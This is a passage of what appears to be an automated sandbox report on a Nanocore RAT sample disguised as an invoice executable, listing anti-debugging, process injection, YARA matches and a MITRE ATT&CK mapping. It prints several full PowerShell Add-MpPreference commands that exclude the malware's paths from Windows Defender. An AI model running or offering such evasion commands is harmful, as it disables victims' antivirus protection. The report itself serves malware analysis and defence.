        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2472
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 1502
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 8058
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: foregroundWindowGot 589
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432 Thread sleep time: -16602069666338586s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720 Thread sleep time: -13835058055282155s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6448 Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmp Binary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmp Binary or memory string: Hyper-V
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
        Source: WerFault.exe, 00000011.00000002.837375808.0000000004528000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process information queried: ProcessInformation

        Anti Debugging:

        Contains functionality to hide a thread from the debugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Code function: 0_2_08A269B0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000 0_2_08A269B0
        Hides threads from debuggers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Thread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_0040289F
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Network Connect: 172.67.172.17 80
        Adds a directory exclusion to Windows Defender
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 79C008
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 3_2_00401C26
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown Process created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknown Process created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.943989994.0000000002E8E000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Program Manager
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Progman
        Source: CasPol.exe, 0000000D.00000002.941774576.0000000002CF8000.00000004.00000001.sdmp Binary or memory string: Program Managerx
        Source: explorer.exe, 0000000B.00000002.916880839.0000000001350000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.933373358.0000000001260000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.928674175.0000000001020000.00000002.00000001.sdmp Binary or memory string: Progmanlock
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp Binary or memory string: Program Manager`
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe; Code function: 3_2_0040A272 WriteProcessMemory, GetVersionExW, CreateRemoteThread, 3_2_0040A272
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara match; File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara match; File source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara match; File source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
        Source: svchost.exe, 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Native API 1 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | Input Capture 11 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Command and Scripting Interpreter 1 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | System Information Discovery 13 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Service Execution 2 | Registry Run Keys / Startup Folder 11 | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Security Account Manager | Security Software Discovery 321 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Windows Service 1 | Software Packing 11 | NTDS | Virtualization/Sandbox Evasion 14 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Process Injection 312 | Timestomp 1 | LSA Secrets | Process Discovery 3 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Registry Run Keys / Startup Folder 11 | Masquerading 221 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 2 | Jamming or Denial of Service | | Abuse Accessibility Features
